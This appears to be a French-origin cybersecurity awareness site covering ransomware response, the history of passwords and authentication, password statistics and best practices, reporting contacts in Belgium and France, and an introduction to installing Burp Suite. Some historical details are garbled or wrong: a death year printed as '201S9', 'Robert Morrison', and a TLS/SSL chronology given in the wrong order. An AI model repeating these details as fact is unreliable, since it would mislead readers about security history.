<figure><img src="/files/GwTRC1HY1Utv3pSaqGzf" alt=""><figcaption><p>Satan RaaS</p></figcaption></figure>

## Responding to a Ransomware attack

### Stay calm and thoughtful

It's hard to stay calm when you can't access important files on your computer. But the first step you should take after being hit by ransomware is to not panic and keep your cool.

Most people rush to pay the ransom before analyzing the seriousness of the situation they find themselves in. Staying calm and taking a step back can sometimes open doors to negotiations with the attacker or resolving the problem without even paying.

### Take a photo/screenshot

of the ransomware note The second step is to immediately take a photo of the ransomware note on your screen using your smartphone or a camera. If possible, also take a screenshot on the affected machine.

This will help you file a police report and speed up the recovery process.

{% hint style="success" %}
Raccourci sur windows pour faire un screenshot:&#x20;

**WINDOWS+SHIFT+S**

<img src="/files/gEer2HGUjB7Qz3P2PCX0" alt="" data-size="original">
{% endhint %}

## Quarantine affected systems

It is important to isolate affected systems as soon as possible. Ransomware typically scans the target network and spreads laterally to other systems.

It is best to separate affected systems from the network to contain the infection and prevent ransomware from spreading.

### Search for decryption tools

Fortunately, many decryption tools are available online, on sites such as No More Ransom.

If you already know the strain name of your ransomware, simply enter it from the web and search for the corresponding decryption key. The list is not alphabetical, and the site adds new decryption tools at the bottom of the list.

### Disable maintenance tasks

You should immediately disable automated maintenance tasks, such as deleting temporary files and rotating logs, on affected systems. This will prevent these tasks from interfering with files that might be useful for forensic analysis and investigation.

{% hint style="info" %}
Forensic analysis:

Forensic analysis (more frequently called “forensic”) consists of investigating an information system after a cyberattack. The analysts will collect all the raw data (deleted files, hard drives, backups, system logs, etc.), study it to understand what happened and draw conclusions. This task, sometimes arduous, makes it possible to produce evidence necessary for internal action or the launch of legal proceedings, for example.

Definition: [**TEHTRIS**](https://tehtris.com/fr/blog/glossaire/forensic)
{% endhint %}

## Disconnect backups

Most modern ransomware strains immediately attack backups to thwart recovery efforts.

It is therefore imperative for you or your company to secure your backups by separating them from the rest of the network. You should also lock access to backup systems until the infection is eliminated.

## Report ransomware

As soon as you notice a ransomware attack, be sure to contact law enforcement.

Ransomware is a crime and should be reported to local law enforcement. Even if law enforcement can't help you decrypt your files, they can at least help other people avoid a similar fate.

Information: [**Belgique** ](#belgique-signaler-une-attaque)/ [**France** ](#france-signaler-une-attaque)

## Deciding whether to pay or not

Deciding to pay for ransomware is not an easy decision and comes with pros and cons. Only pay if you have exhausted all other options and losing data is more damaging to you or your business than paying the ransom.

## Protection against ransomware: The right reflexes

### Never click on dangerous links

Avoid clicking on links in spam messages or on unknown websites. If you click on malicious links, an automatic download may be initiated, which could result in your computer being infected.

### Avoid disclosing personal information

If you receive a call, text message or email from an untrusted source asking for personal information, do not respond. Cybercriminals planning a ransomware attack may try to collect personal information in advance, which is then used to tailor phishing messages specifically for you. If you have any doubts about the legitimacy of the message, contact the sender directly.

<figure><img src="/files/kkyAumI2gNLj7V4rI4I1" alt=""><figcaption></figcaption></figure>

### Do not open attachments from a suspicious email

Ransomware can also find its way to your device through email attachments. Avoid opening any suspicious-looking attachments. To make sure the email is trustworthy, pay close attention to the sender and verify that the address is correct. Never open attachments that prompt you to run macros to view them. If the attachment is infected, opening it will cause a malicious macro to run that gives the malware control of your computer.

<figure><img src="/files/u6tSgSbkninxGCXQMl2Z" alt=""><figcaption></figcaption></figure>

### Never use unknown USB drives

Never connect USB drives or other storage media to your computer if you do not know where they came from. Cybercriminals may have infected the storage media and placed it in a public place to trick someone into using it.

<figure><img src="/files/lrwoCp2DAkCbbPPoeiZP" alt=""><figcaption></figcaption></figure>

### Keep your programs and operating system up to date

Regularly updating programs and operating systems helps protect you from malware. When you update, make sure you have the latest security patches. This will make it more difficult for cybercriminals to exploit vulnerabilities in your programs.

<figure><img src="/files/0THzVVU5SUHYCbin0eM7" alt=""><figcaption></figcaption></figure>

The technical term used is patch management.

{% hint style="info" %}
Patch Management:\
Patch management involves identifying and deploying software updates, also called “fixes” or “patches,” to various endpoints, including computers, mobile devices, and servers.

Patches are typically distributed by software developers to fix known security vulnerabilities or technical issues. They also allow you to add new features and functions to the application. These short-term solutions are intended to be used until the next version of the software is released.

Definition: [**Crowdstrike**](https://www.crowdstrike.fr/cybersecurity-101/patch-management/)
{% endhint %}

### Use only known download sources

To minimize the risk of downloading ransomware, never download software or media files from unknown sites. Trust verified and trustworthy sites for downloads. Websites of this type can be recognized by trust seals. Make sure the browser address bar of the page you are visiting uses "https" instead of "http." A shield or lock symbol in the address bar can also indicate that the page is secure. Also use caution when downloading anything to your mobile device. You can trust the Google Play Store or the Apple App Store, depending on your device.

### Use VPN services on public Wi-Fi networks

Conscientious use of public Wi-Fi networks is a wise protection measure against ransomware. When you use a public Wi-Fi network, your computer is more vulnerable to attacks. To stay protected, avoid using public Wi-Fi for sensitive transactions or use a secure VPN service.

### Belgium: Report an attack

It is possible to file a complaint with the local police and report the incident to CERT.be via <cert@cert.be> indicating the type of data carrier, operating system, mode of infection, name ransomware, payment method and, if possible, providing screenshots of the infected computer system. This action can contribute to the fight against cybercrime internationally, although it does not always guarantee a solution to ransomware infection.

<figure><img src="/files/YESDmfK6vEG8KvokqqJ8" alt=""><figcaption><p>The addresses of CERT.BE and Center for Cybersecurity Belgium</p></figcaption></figure>

### France: Report an attack

"This teleservice can only be used if you are an individual and if you file a complaint in your own name.

Even if you file a complaint online, you can request to meet with an investigator. The investigator may also decide to interview you if he considers it necessary."\
\
Message from the Ministry of the Interior.

{% embed url="<https://www.service-public.fr/particuliers/vosdroits/R45977>" %}


# Passwords

This first part will define passwords, explain their origin as well as their evolution over the years, and give instructions on how to better use and protect them.

## Definition and Context

<figure><img src="/files/9FYsdQfo3HbkCTSJHcSI" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
**Password**

1. Word used to gain access to certain information or to a certain location.
2. (Computer science) Alphanumeric code or phrase, means of authentication, which must be given to access a protected place or to use a resource or service to which access is limited and protected.

**Definition**: The French Language
{% endhint %}

A password is a word, phrase, or string of characters intended to differentiate an authorized user or process (for the purpose of allowing access) from an unauthorized user. In other words, a password is used to prove a person's identity or to authorize access to a resource.

History has shown the usefulness of passwords over time but it has also demonstrated the impact of passwords being broken/discovered and also that the evolution of technologies makes it easier to access passwords. which in the past were judged as "solid".


# Passwords - Origins

## Passwords over time

### Ancient times and wars

In Western history, the first recorded passwords were used by the military, beginning with the biblical Book of Judges (several centuries BC). In this book, the soldiers of Gilead use the word "shibboleth" to identify their enemies, the Ephraimites. The Ephraimites spoke a different dialect, so they said "sibboleth" instead.

The ancient Romans also used passwords a lot in the same way and called them "watchwords". Every night, Roman military guards passed around a wooden tablet on which the password was written. The soldiers passed the tablet around until each camp wrote its initials. This made it possible to detect enemies disguised as Romans.

<figure><img src="/files/iRqM2GzI4XPZjVxUD1wY" alt=""><figcaption></figcaption></figure>

## Passwords in literature

In the 18th century, "Ali Baba and the Forty Thieves", invented by the French orientalist Antoine Galland, tells the story of the password "Open Sesame". Ali Baba, a poor merchant, hears thieves talking about their horde of gold behind the wall of a cave. To open the cave, you must say the words "Open Sesame". Ali Baba takes cover and steals as much loot as possible. Later in the story, Ali Baba's uncle gets wind of the gold and goes to the cave. Once inside, he quickly closes the rock wall behind him to ensure he has the gold all to himself. The uncle eagerly loads bags and bags full of gold. As he turns to leave, he realizes he forgot the password to open the door.

Unfortunately for the uncle, he has no way to reset the password and gets stuck inside waiting for the thieves to return. (The importance of password reset features! 😂)

<figure><img src="/files/fzRPKXJhCN4IuBaEMg9m" alt=""><figcaption><p>Even in history, compromised passwords had a big impact and interesting gains for the attacker!</p></figcaption></figure>

## The Prohibition Password

From 1920 to 1930 in the United States, this is the period known as Prohibition during which the sale of alcohol was prohibited in the country as well as the manufacture, transportation, sale, importation and l export of alcoholic beverages (SOURCE: [WIKIPEDIA](https://fr.wikipedia.org/wiki/Prohibition#:~:text=La%20prohibition%20d%C3%A9signe%20surtout%20la,l'exportation%20de%20boissons%20alcoolis%C3%A9es.)).&#x20;

People could only legally obtain or consume alcohol for medical or religious reasons, so thousands of bars were forced to close their doors. But bar owners soon realized they could still sell alcohol behind closed doors. These bars, known as speakeasies, were open to men and women but the presentation of a card, code phrase or password allowing entry to the establishment was compulsory.

The code words were ridiculous, to say the least: coffin varnish, monkey rum, panther sweat, and tarantula juice, to name a few.

<figure><img src="/files/T82Ot3qtOHy4s1KM9Jo0" alt=""><figcaption><p>Examples of cards used for "speakeasy" bars during prohibition.</p></figcaption></figure>

## The first digital password

In 1960, MIT professor Fernando Corbato realized he also needed to use "passwords" when he built a large shared computer, the CTSS.

{% hint style="info" %}
**CTSS**:

CTSS, which stands for Compatible Time-Sharing System, is one of the first time-sharing operating systems. It was developed by the MAC Project at MIT.

\
Source: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Compatible_Time_Sharing_System#:~:text=CTSS%2C%20qui%20signifie%20Compatible%20Time,le%20Projet%20MAC%20au%20MIT.)
{% endhint %}

Users would all need to access different files without having permission to access each other's terminal!

\=> The solution: each user would have their own password.

EEEEEEAlthough Corbato, who died in 201S9, never accepted credit for the first computer password, he is nevertheless accredited to it.

## Now and After

Today there are passwords for almost everything. Each person has around a hundred of them, which are often shared among family, friends and work colleagues (Netflix, for example). (Trying to remember all these details on a daily basis has led to a lot of password fatigue.\
**And above all the use of simple and repetitive passwords.**

Gone are the days when it was acceptable to store passwords on a sticky note or in a spreadsheet (EXCEL SHEET for English speakers). Today, password managers with autofill and essential security features like two-factor authentication (2FA) and biometrics can help you securely access your accounts, on all your devices, in seconds.


# Passwords - Evolution of authentication

<figure><img src="/files/mbn9kRlm7f4Q7szqb5FZ" alt=""><figcaption></figcaption></figure>

## 60s

### Old-fashioned passwords

The history of authentication begins with passwords in the 1960s, when the first computers were made available to the general public.

Back then, computers were huge, ridiculously expensive, and slow - by today's standards. The fact that only a handful of universities and large companies had a real computer made demand exceptionally high. To meet this demand, universities such as MIT introduced time-sharing operating systems such as the Compatible Time-Sharing System (CTSS), which allowed multiple users to share resources provided by a single computer.

By solving the demand problem, file privacy within a shared file system has become a challenge. It is important to note that the users were researchers and students who used the computer to calculate and store their research and new discoveries - no one worried about losing their "privacy" file.

In fact, everyone had access to everything. The solution appeared in 1961 thanks to Fernando Corbató, researcher and then professor at MIT.

Corbató implemented a simple, that is to say very rudimentary, password program:

* <mark style="color:red;">**Passwords were stored in a plain text file in the file system.**</mark>

It didn't take long for someone to crack the code. Allan Scherr, in an attempt to extend his limited four-hour session of using the MIT computer, simply found the location of the file and printed out the complete list of users' passwords.

<figure><img src="/files/BtGEa4i5DI6iXvd4r7Uz" alt=""><figcaption><p>Photo du professeur Corbató</p></figcaption></figure>

## 70s

### Early 70s

The conclusion from the 1960s was clear:

* <mark style="color:red;">**Storing passwords in a plaintext file is a bad idea.**</mark>

Mistakes made in the past have caused development to add another member to the authentication story. Robert Morrison took up a concept from cryptography: the hash function.

{% hint style="info" %}
Cr**yptography:**

In general, cryptography is a writing technique where an encrypted message is written using secret codes or encryption keys. Cryptography is mainly used to protect a message considered confidential. This method is used in a large number of fields, such as defense, information technology, privacy, etc. There are many cryptographic algorithms that can be used to encrypt (and decrypt for the recipient) the message.\
\
Definition: [**ORACLE**](https://www.oracle.com/fr/security/qu-est-ce-que-la-cryptographie.html#:~:text=En%20g%C3%A9n%C3%A9ral%2C%20la%20cryptographie%20est,un%20message%20consid%C3%A9r%C3%A9%20comme%20confidentiel.)
{% endhint %}

{% hint style="info" %}
**Hash function:**

1. We call a hash function a particular function which, from data provided as input, calculates a fingerprint used to quickly identify, although incompletely, the initial data. Hash functions are used in computing and cryptography.

**Definition**: [**Techno-Science**](https://www.techno-science.net/glossaire-definition/Fonction-de-hachage.html)

2. The use of a hashing function makes it possible not to store passwords in clear text in the database but only to store a fingerprint of them. It is important to use a public algorithm known to be strong in order to calculate the said fingerprints. To date, MD5 is no longer one of the algorithms known to be strong.\
   \
   Definition: [**CNIL**](https://www.cnil.fr/fr/definition/hachage)
   {% endhint %}

When the hash function became a standard, hackers were able to circumvent it. Additional protection was introduced in the form of "SALT" random elements which made the initial hash even more unique and difficult to decrypt. Storing passwords by hashing was a real breakthrough at the time.

{% hint style="info" %}
**Salting (SALT):**\
Salting is a method for strengthening the security of information that is intended to be hashed (for example passwords) by adding additional data in order to prevent two identical pieces of information from leading to the same hash (the result of 'a hash function). The purpose of salting is to combat frequency analysis attacks, attacks using rainbow tables, dictionary attacks and brute force attacks. For these last two attacks, salting is effective when the salt used is not known to the attacker or when the attack targets a large number of hashed data all salted differently.\
\
Definition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Salage_\(cryptographie\))
{% endhint %}

## Milieu 70

Besides hashing, other cryptography techniques have proven beneficial for the development of authentication. Asymmetric cryptography, better known as public key infrastructure, is one such technique. Without going into the details of how it works, this technology is based on two keys. A public key that one can securely share with the rest of the world to prove their identity, and a private key for the digital signature used to verify their identity. A digital certificate is actually a combination of the two - a public key certificate signed with your private key to verify that it's yours.

However, widespread use of public key infrastructure did not occur until the early 1990s. The reason is that this technology was highly confidential and reserved for government institutions. However, widespread use of Public key infrastructure did not occur until the early 90s. The reason is that this technology was highly confidential and reserved for government institutions.

## 80s

As security measures become stronger, hackers are on the rise. The security industry therefore needs to constantly up its game and look for more secure authentication solutions. Static passwords were no longer reliable. Hackers could easily steal, intercept or guess your password and replay it as many times as they wanted. It was in this context that an idea was born. What if a user had a completely different password every time they wanted to access a service? It was at this time that one-time passwords were born.

When developing the concept of single password authentication, two main challenges must be addressed:

How to randomly generate a new unpredictable password that the system recognizes as correct? How to transmit these dynamic passwords to end users? After finding the answers to the aforementioned challenges, the final product was a time-based OTP, delivered through special hardware. Over the years, OTP standards have evolved from time-based, challenge/response, hash-based methods to event-based methods. The delivery of OTPs has finally abandoned the need for a specific hardware device - one-time passwords are delivered via SMS, email or specialized mobile applications.

## 90s

## The emergence of public key infrastructure

The 1970s secret around public key infrastructure was finally exposed during the 1990s. The driving force behind the need for PKI (Public Key Infrastructure) was the advent of the World Wide Web. With a wealth of confidential data online, identifying service users has become crucial.

As mentioned earlier, PKI integrates digital certificates as well as private and public key pairs. This led to the development of the SP4 protocol, which was later renamed to the more widely recognized Transport Layer Security (TLS) protocol. A few years later, Secure Sockets Layer (SSL) was introduced, including server authentication and key components.

Over time, the core functions of PKI technology have evolved to include the creation, storage, and distribution of digital certificates. These functions also include:

* **CA (Certification Authority):** responsible for issuing and signing digital certificates
* **RA (Registration Authority):** responsible for verifying the identity of users submitting requests for digital certificates
* **Central directory:** intended for storing keys
* **CMS (Certificate Management System)**: managing operational activities (access to stored certificates, etc.)
* **Certification Policy:** a statement describing PKI requirements

## 2000s

## The advent of multi-factor authentication and single sign-on (SSO)

Multi-factor authentication (MFA) requires a combination of several authentication factors to verify a person's identity. With the OTPs of the 80s, we started to touch on this subject. The 2000s eliminated the need for a specific hardware device to generate dynamic passwords. Emerging technologies and digitalization have brought specialized mobile applications for MFA and user OTP generation.

The three main authentication elements needed for successful identity verification are:

* **Knowledge** – something the user knows, such as a PIN or password.
* **Possession** – something the user owns; a digital certificate, smart card, mobile device, etc.
* **Inherence** - something that directly verifies that it is the user, i.e. biometric information (e.g. fingerprint, face or voice recognition).

Successful authentication involves the combination of at least two security elements. If an attacker obtains a password, they should also have access to the second or even third factor used to authenticate.

Single sign-on (SSO) represented a significant advancement in authentication. The basic principle of SSO is that users cannot be trusted with passwords. We tend to underestimate the importance of passwords, reusing them repeatedly and sometimes even sharing them with friends, family members or colleagues. It's no wonder we forget our passwords since we need a different one for each service we use. To solve these and other problems, the concept of a trusted third party responsible for identity verification was born.

SSO relies on a trusted third party to authenticate users, eliminating the need to verify credentials on each website or service. When a user logs in to a website, the site checks to see if an SSO provider has already authenticated that user. If the verification is successful, the user accesses the site without needing to log in again; otherwise, the user must log in to the website. Although convenient, SSO also poses some risks. For example, if a user's Gmail account is compromised, any websites or services they used Gmail to sign in to are also at risk.

## 2010s

### Biometrics are no longer just in movies

Biometric authentication uses physical characteristics to determine the user's identity. This includes fingerprint scanning, facial recognition, voice recognition, iris scanning, etc. Basically, biometrics cover the “something you are” element of authentication in the strong authentication requirement.

To everyone's surprise, iPhones were not the first to integrate biometrics into their offering. The very first smartphone that enabled fingerprint authentication was the Android-powered Motorola ATRIX. Apple followed the same path three years later by replacing the convenient fingerprint feature with Face ID in 2017. 30,000 infrared dots scan the user's face and determine their identity.

Today, biometrics are part of our daily routine – unlocking our smartphones, confirming online purchases, etc. They are extremely difficult to forge and are considered one of the most secure authentication methods available. However, debates over privacy concerns continue to raise legal questions.


# Passwords - Statistics

A Google study on the use of passwords by American users was released in 2019 as well as a Ponemon Institute study in 2020.

The Ponemon Institute is considered the leading research center devoted to privacy, data protection, and information security policy.

Yubico released its second annual State of Password and Authentication Security Behavior Report, conducted by the Ponemon Institute in 2020. The study surveyed 2,507 IT security practitioners in Australia, France, Germany, Sweden, the United Kingdom and the United States, as well as 563 individual users.

The Google study is present in the original version via this [**LIEN**](https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/PasswordCheckup-HarrisPoll-InfographicFINAL.pdf)**.**\
The Ponemon Institute study in its original version can be found [**ICI**](https://mms.businesswire.com/media/20200219005336/en/773763/5/191522-Ponemon-Infographic-2020-final-1.jpg?download=1).

## Weak Password Statistics and Habits

As cybercriminals' capabilities continue to evolve, our password management habits and understanding of cybersecurity best practices have not kept pace. This is true for both individuals and businesses, as the statistics below show.

### Google

* 75% of Americans say they are frustrated with having to store and keep track of their passwords.
* 24% of Americans have used the word "password", "Qwerty" or "123456" as their password.
* 43% of Americans have shared their password with someone.
* 20% of Americans have shared their email account password.
* Only 37% of Americans will use two-factor authentication to secure their passwords in 2020.
* Only 34% of Americans say they change their passwords regularly.
* Only 15% of Americans use an online password manager.
* 66% of Americans use the same password for multiple online accounts.
* 27% of Americans have tried to guess someone else's password, and 17% of them were able to guess it correctly.
* 13% of Americans reported reusing their password across all their accounts in 2019.
* Only 32% of Americans were able to correctly define the terms "phishing," "password manager" and "two-step verification."

### Ponemon Institute

* 42% of organizations rely on post-it notes for password management.
* 59% of organizations rely on human memory to manage passwords.
* 62% of businesses say they are not taking the necessary steps to properly secure mobile data.

## Word safety statistics at the enterprise level

Cybercriminals are not only a threat to individuals, they also pose a significant risk to large businesses across all industries. That said, not all sectors are in the same boat. Compliance rules vary widely across industries, and some industries are quicker than others to adopt and maintain appropriate security measures. For example, technology and software companies are often very diligent in their cybersecurity defenses, while insurance companies often lag behind.

## Lastpass Report

**Report link.**

* 37% of employees at technology and software companies use multi-factor authentication (MFA) – the use of two or more separate factors for verification and authorization of a user.
* 33% of employees in the education sector use AFM and 32% of employees in the banking or financial sector use AFM.
* At the low end, only 20% of legal or insurance employees use MFA.

#### Password reuse

Password reuse is when someone uses the same password for multiple online accounts and services, for example using the same password for their email address and bank account. Many people reuse a password because it is easier for them to remember one password rather than several.

* Media and advertising employees reuse their passwords almost twice as much as employees in other industries.
* Employees in the nonprofit sector reuse the fewest passwords (around 9 on average).
* Employees in the technology or software industry reuse about 15 passwords on average.

## Problematic

The figures are not very representative for “French-speaking” countries (Belgium, France, Morocco, etc.). Be-Hacktive will therefore launch its campaign to investigate the habits of French-speaking users.

The survey link will be available soon and necessarily ANONYMOUS


# Passwords - Protect yourself

<figure><img src="/files/AcM0smyYt332kf2s1fMQ" alt=""><figcaption><p>Source: <a href="https://www.cybermalveillance.gouv.fr/tous-nos-contenus/bonnes-pratiques/mots-de-passe"><strong>CYBERMALVEILLANCE.GOUV.FR</strong></a></p></figcaption></figure>

Hackers harvest, use and sell the passwords of businesses and individuals in order to obtain financial rewards, damage reputations, steal intellectual property or carry out other illegal activities.

**You must adopt good reflexes regarding passwords whether for private or professional use, here is a non-exhaustive list.**

This situation is largely due to lack of employee education and corporate negligence. Within your organization, advocate for a concerted, company-wide effort on security and password protection.

## 11 Password Security Best Practices

### 1- Unique passwords for each account

Use different passwords for each account, so that if one is compromised, the others are not. This helps prevent credential-stuffing attacks, where hackers use credentials stolen from other common platforms in the hope of gaining entry.

{% hint style="info" %}
**Credential-Stuffing:**

Credential stuffing is a method of cyberattack in which attackers use lists of compromised user credentials to break into a system. The attack uses bots for automation and is based on the assumption that many users reuse usernames and passwords across multiple services.

SOURCE: [**IMPERVA.COM**](https://www.imperva.com/learn/application-security/credential-stuffing/#:~:text=Credential%20stuffing%20is%20a%20cyberattack,and%20passwords%20across%20multiple%20services.)
{% endhint %}

### **2-** Characters and symbols instead of letters

Sentences using symbols such as a smiley face ":)" instead of the word "happy", or replacing the word "to" with the number "2". Using characters and symbols instead of letters can make your password more difficult for hackers or brute force attack techniques to guess.

### 3- Passphrases

One of the best practices for password security is to use passphrases made up of words that don't normally go together, rather than long-character passwords that are easy to forget. Passwords like "airplane puppy eating banana" are easier to remember and less likely to be hacked than "puppy running in the yard."

Use at least four words in your passphrase while respecting point 2 (Characters and symbols).

### **4-**&#x41;t least 12 characters

For optimal password security, our best practices recommend using at least twelve interchangeable characters (lowercase, uppercase, symbols, and numbers) in your password, whether or not you use a passphrase. Password length is more important for security than the use of numbers, characters, or symbols. Password length is a major indicator of how long it will take for a password to be cracked by a brute force attack or other password cracking algorithm.

### 5-Analyze password strengthv

Always check the strength of your password. Most sites offer a password analyzer that shows how strong or weak your password is. Pay attention to the analyzer results and change your password accordingly to make it stronger.

Nexcess offers a unique password generation tool that allows you to create complicated passwords, generate passphrases or even check the strength of your existing passwords easily and securely, the link below below:

\=> [**Nexcess: Random password generator**](https://www.nexcess.net/web-tools/secure-password-generator/)

<figure><img src="/files/gRsiHAqzSSfDK0poTwQN" alt=""><figcaption><p>The main page of the Nexcess site to generate a password or check its strength.</p></figcaption></figure>

### 6-Change your password every quarter

Passwords can always be guessed or cracked if given enough time. This is why you should change your password every 60 to 90 days for user accounts especially in businesses. This helps ensure that hackers who use social engineering, brute force, and credential-stuffing can't use your old passwords to access your systems or data.

Obviously in practice, it is sometimes very difficult to remember all the passwords but even more complicated is the dates for changing them. In companies, there are policies automatically set up to remind and force password changes.

### 7-Enable two-factor authentication

Use two-factor authentication (2FA), also known as multi-factor authentication. This is a text- or app-based authentication method that verifies your identity before access. Even if a hacker somehow obtains your password, they won't be able to access your systems if they don't also have access to your phone or email, for example.

### 8-Use a password manager

Finally, opt for a password manager.

Password managers use multiple forms of encryption to ensure that your passwords are even harder to crack and allow you to remember only one password. Passphrases are perfect for using as the master password in your password manager, and then you can use extremely difficult passwords for your other user accounts and systems.

### 9- Check your credentials against data leaks

Another password security best practice is to use a security tool like Have I Been Pwned to check if your credentials have been included in recent global data breaches. This allows you to make informed decisions about which passwords should be changed immediately.

A complete article was written on our BE-HACKTIVE blog:

**=>** Am I a victim of data leaks?

### 10-Never use personal information in a password

Never use your first name, last name, age, birthday, phone number, address, bank account or other sensitive personal information in your password. Don't even use your dog's name or your favorite travel location. Most of this information is available on your Facebook account or other site/social network and therefore accessible to attackers.

### 11-Keep your passwords confidential

In short, don't share your passwords. This is particularly true when someone starts a conversation with you and asks you for your password, but also a loved one asks you for access to your accounts.

In general, keep your password as confidential as your banking PIN. It's that important.

## Best practices for IT teams

<figure><img src="/files/hzbmVcmCwoGxkuBlUZ7j" alt=""><figcaption></figcaption></figure>

When you are in charge of implementing password policies in your IT team, it is good to keep the following points in mind:

* Limit incorrect login attempts to 5 or less
* Allow passwords of 64 characters or more, rather than limiting the length to 8 or 12 characters.
* Implement multi-factor authentication. Multi-factor or two-factor authentication prevents attackers from gaining access to your portals or network after cracking simple passwords.
* Deploy privileged access management software for employees with access to sensitive data.
* Ensure your organization uses up-to-date anti-malware and vulnerability management solutions.
* Adopt the practice of changing company account passwords when an employee leaves the company.
* Avoid logging in to accounts as “root” or “administrator”. Use your own login and change user (SUDO) or "runas" to execute administration commands.
* Consider disabling access for "root" or "administrator" accounts.
* Implement password audits. Verify that your employees are following the organization's password security policy. An audit will monitor password changes to ensure compliance. It will also highlight and correct weak access points.
* Send employees reminders about password best practices. Employees generally have good intentions, but they may forget to update their passwords or comply with the organization's password policy.
* Send employees email notifications reminding them of policies, best practices, and the need to rotate passwords before they expire.
* Offer training sessions on password best practices.

## Points de contact

### Belgium

* The CCB (Center for Cybersecurity Belgium) has set up an email address <suspect@safeonweb.be> to voluntarily report phishing emails.

{% hint style="info" %}
"The goal of <suspect@safeonweb.be> is simple: we call on Internet users to voluntarily report suspicious messages they receive to this address, the famous phishing messages. We then check the URLs and annexes of these messages sent. This is an automated process. We block suspicious links. This system helps protect less vigilant Internet users who have clicked on the link.

Source: [**Safeonweb.be**](https://www.safeonweb.be/fr/quest-ce-que-suspectsafeonwebbe)
{% endhint %}

* The FPS Economy has set up a contact point for all fraud, deception, scams and scams via the following link: <https://pointdecontact.belgique.be/meldpunt/fr/bienvenue>

{% hint style="info" %}
When your rights as a consumer or business have been violated or you are the victim of some form of deception, you can report it via this new site. The point of contact gives a tailor-made opinion and directs you to the appropriate body. The contact point is the result of collaboration between the Federal Agency for the Safety of the Food Chain (AFSCA), the Federal Agency for Medicines and Health Products (FAMHP), the Social Information and Research Service (SIRS), the Federal Police, the FPS Finance and the FPS Economy.

Source: [**Police.be**](https://www.police.be/5998/fr/questions/prevention/point-de-contact-pour-fraudes-tromperies-arnaques-et-escroqueries)
{% endhint %}

## France

**Cybermalveillance**

The French government has set up the following site:

* Cybermalveillance.gouv.fr's mission is to assist individuals, businesses, associations, communities and administrations who are victims of cybercrime, to inform them about digital threats and the means to protect themselves from them.


# Definition and Methodology

<figure><img src="/files/BLc8v7RE3IwdSJFogHo9" alt=""><figcaption></figcaption></figure>

COMING SOON !!!


# Burp Suite

We will discover the tool but also the BURP academy which allows you to learn the different vulnerabilities and themes concerning web security.

<figure><img src="/files/F423IdtGZy7x62g9jdM1" alt=""><figcaption></figcaption></figure>

## Burp suite, what is that?

<figure><img src="/files/A4peaps7CtbmV1QSe3F2" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Burp Suite is an integrated platform for testing web application security. Its various tools work seamlessly to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities. Burp gives you complete control, allowing you to combine advanced manual techniques with cutting-edge automation, to make your work faster, more efficient and more fun.\
\
Definition: [**KALI.ORG**](https://www.kali.org/tools/burpsuite/)
{% endhint %}

Simply put: Burp Suite is a framework written in Java, developed by PortSwigger Ltd, which aims to provide a unique and comprehensive service for web application penetration testing. In many ways, this goal is achieved since Burp is the industry standard tool for practical web application security assessments.

The Burp suite is also very commonly used for evaluating mobile applications, as the features that make it so attractive for testing web applications translate almost perfectly to testing the APIs that power most mobile applications.

{% hint style="info" %}
Framework:

A framework literally means “working framework”. It provides, in fact, a base of tools and modules that can be used on different projects. For example, a framework can include predefined classes, variables and functions.\
\
Definition: [**PURE-ILLUSION.COM**](https://www.pure-illusion.com/lexique/definition-de-framework#:~:text=Un%20Framework%20est%20une%20boite,web%20ou%20d'une%20application.)\
\
API:

API which comes from the English Application Programming Interface, or application programming interface, is a set of definitions and protocols that facilitates the creation and integration of applications.\
\
Definition: [**REDHAT**](https://www.redhat.com/fr/topics/api/what-are-application-programming-interfaces)
{% endhint %}

At the simplest level, Burp can capture and manipulate all traffic between an attacker and a web server: this is the core of the framework. After capturing the requests, we can choose to send them to various other parts of Burp (which we'll cover in more detail next):

* Intruder
* Repeater&#x20;
* Collaborator
* Extender
* Proxy
* ...

## Objective and presentation

The goal is therefore to discover how BURP SUITE works, from installation to exploitation of vulnerabilities.

The PortSwigger academy offers theory and labs to learn how to use burp but also vulnerabilities linked to web applications.

<figure><img src="/files/TTEUJsqjSALYzWbEQ1VF" alt=""><figcaption><p>An example of the themes and labs available</p></figcaption></figure>

Tryhackme also offers courses on the use of BURP, we will talk about it again at the end of the capsule.

The adventure will be long but it will be worth it!

<figure><img src="/files/6HFGyAC9hlRCuJbfLwh9" alt=""><figcaption></figcaption></figure>


# Installation

<figure><img src="/files/V7E5Jv01KUyR2gVreAWa" alt=""><figcaption></figcaption></figure>

## Windows

### Download

Use the links below to download the latest version of Burp Suite Professional or Community Edition.

| Version                                                                         | D            |
| ------------------------------------------------------------------------------- | ------------ |
| [**Professional**](https://portswigger.net/burp/releases/professional/latest)   | Paid version |
| [**Community Edition**](https://portswigger.net/burp/releases/community/latest) | Free version |

### Installation

Run the installer and launch Burp Suite.

When asked to select a project file and configuration, simply click Next and then Start Burp so you don't have to do that yet.

{% hint style="info" %}
If you are using Burp Suite Professional, enter your license key when prompted. If you don't have one yet, you can subscribe or request a free trial.
{% endhint %}

<figure><img src="/files/PZpChcmJZ97ziIR6BKKW" alt=""><figcaption><p>Window to enter the Burp Pro license key</p></figcaption></figure>

### Run

When Burp is launched you get the following screen:

<figure><img src="/files/PabdDV1xDmKZMqjAz3gL" alt=""><figcaption></figcaption></figure>

You can keep all data and configuration settings for a particular job in a Burp project file. The file saves data incrementally as you work. There is no need to manually save your work.

{% hint style="danger" %}
When testing certain applications, this can generate several gigabytes of data. Make sure you have enough free disk space when using Burp project files.
{% endhint %}

You can select or create a project file from the Getting Started Wizard. The available options depend on which edition of Burp Suite you are using:

<table><thead><tr><th width="168.33333333333331">Project type</th><th width="253">Edition</th><th>Description</th></tr></thead><tbody><tr><td>Temporary</td><td>Communauty et Professional</td><td>Select this option for quick tasks where you don't need to save your work. All data is retained in memory and is lost when you close Burp.</td></tr><tr><td>New project on disk</td><td>Professional</td><td>Create a new project file. This file contains all the project data and configuration.</td></tr><tr><td>Open existing project</td><td>Professional</td><td>To reopen a project file. You can choose from a list of recently opened projects.</td></tr></tbody></table>

## Kali linux

Burp community is installed by default on Kali Linux versions:

<figure><img src="/files/b8XDtIYoSj6V9bB1CXwH" alt=""><figcaption></figcaption></figure>


# Intercept HTTP traffic with Burp Proxy

